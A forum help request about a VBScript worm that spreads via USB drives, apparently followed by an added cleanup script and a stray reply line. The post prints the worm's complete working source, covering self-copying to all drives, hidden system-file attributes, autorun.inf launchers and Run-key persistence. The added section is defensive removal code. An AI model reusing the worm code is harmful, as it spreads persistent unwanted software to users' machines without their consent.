So a few computers where I work have gotten this stupid "virus" on them. It's basically a vbscript that disables autorun through a combination of copying itself into C: and C:\Windows, and some registry edits (it also copies itself to any usb drive inserted). Our Antivirus software doesn't do anything to it, and attempting to delete the file from C:\Windows doesn't work as it's a protected system file now. I've tried using a DOS boot disk and the WinXP SP2 CD to delete it from the command prompt, but it's not even visible.
From what I can tell, it doesn't do anything malicious itself, but any software that does its own shit without my intervention is annoying, and we kind of NEED autorun on most of our computers.
So here it is: (spoiler'd for wall of text)
'
'---Disables Autorun to prevent the spread of malicious code.--->
'---v0.1
'
on error resume next
dim narsource,nar_RunDir,windir,disk_Drive,fso,mf,autorun,to_File,text,shell,in_WinDir,wsh_Path
set fso = CreateObject("Scripting.FileSystemObject")
set shell = CreateObject("Wscript.shell")
set mf = fso.GetFile(Wscript.ScriptFullname)
nar_RunDir = fso.GetParentFolderName(mf)
Set windir = fso.getspecialfolder(0)
in_WinDir = 2
wsh_Path = fso.GetFile(Wscript.Fullname)
'---Open the drive just like autorun would if it is not running from the windows directory--->
If (fso.GetAbsolutePathName(windir) <> fso.GetAbsolutePathName(nar_RunDir)) Then
shell.run(windir & "\explorer.exe /root," & nar_RunDir)
in_WinDir = 0
Else
in_WinDir = 1
End If
'---If file is in windir and not running from windir then write the registry run value and exit--->
If (fso.FileExists(windir & "\nar.vbs") = 0 or in_WinDir = 1) Then
autorun = "[autorun]"&vbcrlf&"shellexecute=wscript.exe nar.vbs"
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
narsource=narsource & text.readline
narsource=narsource & vbcrlf
loop
If (in_WinDir = 0) Then
set to_File = fso.getfile(windir & "\Nar.vbs")
to_File.attributes = 32
set to_File=fso.createtextfile(windir & "\Nar.vbs",2,true)
to_File.write narsource
to_File.close
set to_File = fso.getfile(windir & "\Nar.vbs")
to_File.attributes = 39
End If
do while (in_WinDir = 1)
'---Add nar and autorun to each local disk drive excluding floppies--->
for each disk_Drive in fso.drives
If (disk_Drive.drivetype = 1 or disk_Drive.drivetype = 2) Then
set to_File=fso.GetFile(disk_Drive.path & "\nar.vbs")
to_File.attributes = 32
set to_File=fso.CreateTextFile(disk_Drive.path & "\nar.vbs",2,true)
to_File.write narsource
to_File.close
set to_File=fso.GetFile(disk_Drive.path & "\nar.vbs")
to_File.attributes = 39
set to_File=fso.GetFile(disk_Drive.path & "\Autorun.inf")
to_File.attributes = 32
set to_File=fso.CreateTextFile(disk_Drive.path & "\Autorun.inf",2,true)
to_File.write autorun
to_File.close
set to_File=fso.GetFile(disk_Drive.path & "\Autorun.inf")
to_File.attributes = 39
End If
next
'---Edit the registry to disable autorun--->
shell.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\nar",windir&"\nar.vbs","REG_SZ"
shell.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\AutoRun",0,"REG_DWORD"
shell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDriveTypeAutoRun",255,"REG_DWORD"
shell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDriveAutoRun",67108863,"REG_DWORD"
shell.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveAutoRun",67108863,"REG_DWORD"
shell.regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveAutoRun",67108863,"REG_DWORD"
'---Run once every 5 minutes while within the Windows directory--->
wscript.sleep(60000)
loop
'---Run the instance in the windows directory so a thumb drive is not stuck in use and the process continues--->
If (fso.GetAbsolutePathName(windir) <> fso.GetAbsolutePathName(nar_RunDir)) Then
temp = windir&"\nar.vbs"
shell.run temp,1,0
End If
End If
shell.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\nar",windir&"\nar.vbs","REG_SZ"
It also creates an autorun.inf on usb drives which simply runs the vbs with:
shellexecute=wscript.exe nar.vbs
Basically, I want to reverse everything this little bastard does, preferably with my own vbscript and an autorun on MY usb drive, so it clears it from any machine I stick it into. I went to Googling about vbscript, but starting with absolutely zero knowledge of it, I didn't make a lot of headway. At the very least, could someone point me to a good in-depth guide to vbs?
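The cleanup the post asks for, as an added example that is not from the thread and not the poster's code: a VBScript that undoes each change the posted script makes on the machine it is run on (kills the looping copy, removes the Run value, restores the autorun registry values, clears the attributes on the dropped files and deletes them). Note that the posted script sets NoDriveTypeAutoRun to 255, which disables autorun for every drive type, so an autorun.inf on your own USB stick cannot launch this on an infected machine; run it by hand instead. It assumes the file and value names are exactly those in the posted script, and that none of your own policy settings live in the NoDrive*AutoRun values.

```vbscript
' nar_cleanup.vbs -- added example, not code from the thread. Reverses what the
' posted nar.vbs does on one machine; run as an administrator: cscript nar_cleanup.vbs
' Assumes the names below are exactly those in the posted script (they are).
Option Explicit
On Error Resume Next        ' a missing value or an unready drive must not stop the sweep
Dim fso, shell, wmi, proc, drv, hive, valName, windir
Set fso   = CreateObject("Scripting.FileSystemObject")
Set shell = CreateObject("WScript.Shell")
windir    = fso.GetSpecialFolder(0).Path
' 1. Stop the copy in %windir%: it loops forever, rewriting the registry every minute.
'    (Matches on "nar.vbs", so do not give this cleanup script a name containing that.)
Set wmi = GetObject("winmgmts:\\.\root\cimv2")
For Each proc In wmi.ExecQuery("SELECT * FROM Win32_Process WHERE Name='wscript.exe' OR Name='cscript.exe'")
    If InStr(1, proc.CommandLine & "", "nar.vbs", vbTextCompare) > 0 Then proc.Terminate
Next
' 2. Remove persistence and undo the autorun-disabling edits.
shell.RegDelete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\nar"
shell.RegWrite  "HKLM\SYSTEM\CurrentControlSet\Services\Cdrom\AutoRun", 1, "REG_DWORD"  ' 1 is the Windows default
For Each hive In Array("HKLM", "HKCU", "HKEY_USERS\.DEFAULT")
    For Each valName In Array("NoDriveTypeAutoRun", "NoDriveAutoRun")
        ' deleting the policy value lets the Windows default apply again
        shell.RegDelete hive & "\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\" & valName
    Next
Next
' 3. Delete the dropped files. Attributes 39 = read-only+hidden+system+archive, which is
'    why a plain dir/del from a boot disk never showed them; clear the attributes first.
Sub Zap(path)
    Dim f
    If fso.FileExists(path) Then
        Set f = fso.GetFile(path)
        f.Attributes = 0
        fso.DeleteFile path, True
        WScript.Echo "removed " & path
    End If
End Sub
Function MentionsNar(path)      ' only remove an Autorun.inf that actually launches nar.vbs
    Dim ts: MentionsNar = False
    If fso.FileExists(path) Then
        Set ts = fso.OpenTextFile(path, 1)
        MentionsNar = InStr(1, ts.ReadAll, "nar.vbs", vbTextCompare) > 0
        ts.Close
    End If
End Function
Zap windir & "\nar.vbs"
For Each drv In fso.Drives
    If (drv.DriveType = 1 Or drv.DriveType = 2) And drv.IsReady Then
        Zap drv.Path & "\nar.vbs"
        If MentionsNar(drv.Path & "\Autorun.inf") Then Zap drv.Path & "\Autorun.inf"
    End If
Next
```

The HKCU value is cleared only for the account running the script, so run it once per affected user, then reboot and check that the Run value and the files listed above are gone.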
Starts at the bottom of page 207. It doesn't look like disabling the script will be too hard. That will at least keep it from running.